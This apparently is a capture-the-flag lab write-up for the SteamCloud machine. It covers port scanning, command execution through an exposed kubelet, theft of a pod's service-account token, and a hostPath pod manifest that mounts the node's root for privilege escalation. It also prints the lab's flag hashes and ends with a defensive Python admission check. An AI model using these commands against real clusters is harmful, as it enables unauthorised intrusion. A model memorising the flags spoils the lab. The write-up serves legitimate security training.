[Meachines] [Easy] SteamCloud Kubernetes-RCE + Kubernetes node privilege escalation

2025-01-27

Information Gathering

IP Address     Open Ports
10.10.11.133   TCP: 22, 2379, 2380, 8443, 10249, 10250, 10256

$ sudo masscan -p1-65535,U:1-65535 10.10.11.133 --rate=1000 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.133

PORT      STATE SERVICE          VERSION
22/tcp    open  ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fc:fb:90:ee:7c:73:a1:d4:bf:87:f8:71:e8:44:c6:3c (RSA)
|   256 46:83:2b:1b:01:db:71:64:6a:3e:27:cb:53:6f:81:a1 (ECDSA)
|_  256 1d:8d:d3:41:f3:ff:a4:37:e8:ac:78:08:89:c2:e3:c5 (ED25519)
2379/tcp  open  ssl/etcd-client?
| tls-alpn: 
|_  h2
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2025-01-24T04:39:05
|_Not valid after:  2026-01-24T04:39:05
|_ssl-date: TLS randomness does not represent time
2380/tcp  open  ssl/etcd-server?
| ssl-cert: Subject: commonName=steamcloud
| Subject Alternative Name: DNS:localhost, DNS:steamcloud, IP Address:10.10.11.133, IP Address:127.0.0.1, IP Address:0:0:0:0:0:0:0:1
| Not valid before: 2025-01-24T04:39:05
|_Not valid after:  2026-01-24T04:39:05
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  h2
8443/tcp  open  ssl/https-alt
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: 6b4621bf-7930-4a2f-8c49-74add366dd60
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: abfeee27-f5ee-4433-8cb9-a594adbc6db6
|     X-Kubernetes-Pf-Prioritylevel-Uid: 3d2b5b73-6c73-4e3f-a540-29191fcdc2d0
|     Date: Fri, 24 Jan 2025 04:46:12 GMT
|     Content-Length: 212
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/nice ports,/Trinity.txt.bak"","reason":"Forbidden","details":{},"code":403}
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: bc7e3d97-a3ae-4bcb-8b92-5e99c22912e0
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: abfeee27-f5ee-4433-8cb9-a594adbc6db6
|     X-Kubernetes-Pf-Prioritylevel-Uid: 3d2b5b73-6c73-4e3f-a540-29191fcdc2d0
|     Date: Fri, 24 Jan 2025 04:46:09 GMT
|     Content-Length: 185
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
|   HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Audit-Id: a81f3169-fbce-4f9b-bad0-022462d1f1b4
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     X-Kubernetes-Pf-Flowschema-Uid: abfeee27-f5ee-4433-8cb9-a594adbc6db6
|     X-Kubernetes-Pf-Prioritylevel-Uid: 3d2b5b73-6c73-4e3f-a540-29191fcdc2d0
|     Date: Fri, 24 Jan 2025 04:46:11 GMT
|     Content-Length: 189
|_    {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
| ssl-cert: Subject: commonName=minikube/organizationName=system:masters
| Subject Alternative Name: DNS:minikubeCA, DNS:control-plane.minikube.internal, DNS:kubernetes.default.svc.cluster.local, DNS:kubernetes.default.svc, DNS:kubernetes.default, DNS:kubernetes, DNS:localhost, IP Address:10.10.11.133, IP Address:10.96.0.1, IP Address:127.0.0.1, IP Address:10.0.0.1
| Not valid before: 2025-01-23T04:39:04
|_Not valid after:  2028-01-24T04:39:04
10249/tcp open  http             Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
10250/tcp open  ssl/http         Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| tls-alpn: 
|   h2
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=steamcloud@1737693547
| Subject Alternative Name: DNS:steamcloud
| Not valid before: 2025-01-24T03:39:06
|_Not valid after:  2026-01-24T03:39:06
10256/tcp open  http             Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Kubelet - RCE

Kubelet is a core component of Kubernetes: it is the main process running on every worker node and is responsible for managing and maintaining the containers on that node. It communicates with the Kubernetes control plane (such as the API Server), receives the workloads assigned to its node and runs them, and reports the node's status back.

# curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"

Enumerate pods

$ ./kubeletctl_linux_amd64 --server 10.10.11.133 pods

$ ./kubeletctl_linux_amd64 --server 10.10.11.133 exec "whoami" -p nginx -c nginx

$ ./kubeletctl_linux_amd64 --server 10.10.11.133 exec "/bin/bash" -p nginx -c nginx

User.txt

6f85b72ab0e8c2cd1c46d2e5a7cd3d65

Privilege Escalation: Kubelet && kubectl

https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#kubernetes-enumeration

root@nginx:~# ls -la /run/secrets/kubernetes.io/serviceaccount

root@nginx:/var/run/secrets/kubernetes.io/serviceaccount# cat token
root@nginx:/var/run/secrets/kubernetes.io/serviceaccount# cat ca.crt

$ ./kubectl -s https://10.10.11.133:8443 get pods --certificate-authority=/tmp/ca.crt --token=$token

apiVersion: v1
kind: Pod
metadata:
  name: evil-maptnh
  namespace: default
spec:
  containers:
  - name: evil-maptnh
    image: nginx:1.14.2
    volumeMounts:
    - mountPath: /mnt
      name: evil-exp
  volumes:
  - name: evil-exp
    hostPath:
      path: /

$ ./kubectl -s https://10.10.11.133:8443 --certificate-authority=/tmp/ca.crt --token=$token apply -f /tmp/evil.yaml

$ ./kubectl -s https://10.10.11.133:8443 --certificate-authority=/tmp/ca.crt --token=$token get pods

$ ./kubeletctl_linux_amd64 --server 10.10.11.133 exec "/bin/bash" -p evil-maptnh -c evil-maptnh

Root.txt

a7d4b0817cea88036a6846107f92edb2
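The escalation above works only because nothing in the cluster refused a pod that mounts the node's `/` through hostPath. The following is an added example, not code from this writeup or from Kubernetes itself, of the admission check that would have rejected the evil-maptnh manifest: pod specs are passed as dicts in the shape `kubectl get pod -o json` emits, and `SENSITIVE_PREFIXES` is an assumed policy list.

```python
import posixpath

# Host paths that hand a pod control of the node once mounted (assumed policy list).
SENSITIVE_PREFIXES = ("/", "/etc", "/root", "/var/lib/kubelet", "/var/run/docker.sock")

def _normalize(path):
    # Collapse "//../etc/" style inputs so prefix matching cannot be bypassed.
    return posixpath.normpath("/" + path.lstrip("/"))

def is_sensitive(host_path):
    p = _normalize(host_path)
    # "/" only matches itself; every other prefix also matches its whole subtree.
    return any(p == s or p.startswith(s + "/") for s in map(_normalize, SENSITIVE_PREFIXES))

def hostpath_violations(pod):
    """One message per container mount that reaches a sensitive host path."""
    spec = pod.get("spec", {})
    host_vols = {v["name"]: v["hostPath"].get("path", "")
                 for v in spec.get("volumes", []) if "hostPath" in v}
    findings = []
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        for m in c.get("volumeMounts", []):
            path = host_vols.get(m["name"])
            if path is not None and is_sensitive(path):
                mode = "ro" if m.get("readOnly") else "rw"
                findings.append(f"container {c['name']!r} mounts host "
                                f"{_normalize(path)!r} at {m['mountPath']!r} ({mode})")
    return findings

def admit(pod):
    """Admission decision for a pod spec: (allowed, reasons)."""
    reasons = hostpath_violations(pod)
    return (not reasons, reasons)

# The evil-maptnh manifest from the writeup, rewritten as a dict (constructed input).
EVIL_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "evil-maptnh", "namespace": "default"},
    "spec": {
        "containers": [{"name": "evil-maptnh", "image": "nginx:1.14.2",
                        "volumeMounts": [{"mountPath": "/mnt", "name": "evil-exp"}]}],
        "volumes": [{"name": "evil-exp", "hostPath": {"path": "/"}}],
    },
}

if __name__ == "__main__":
    allowed, why = admit(EVIL_POD)
    print("ALLOW" if allowed else "DENY", why)
```

In a real cluster the same rule belongs in a ValidatingAdmissionPolicy or a Kyverno/OPA policy, and the service account the nginx pod runs under should not be allowed to create pods at all.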

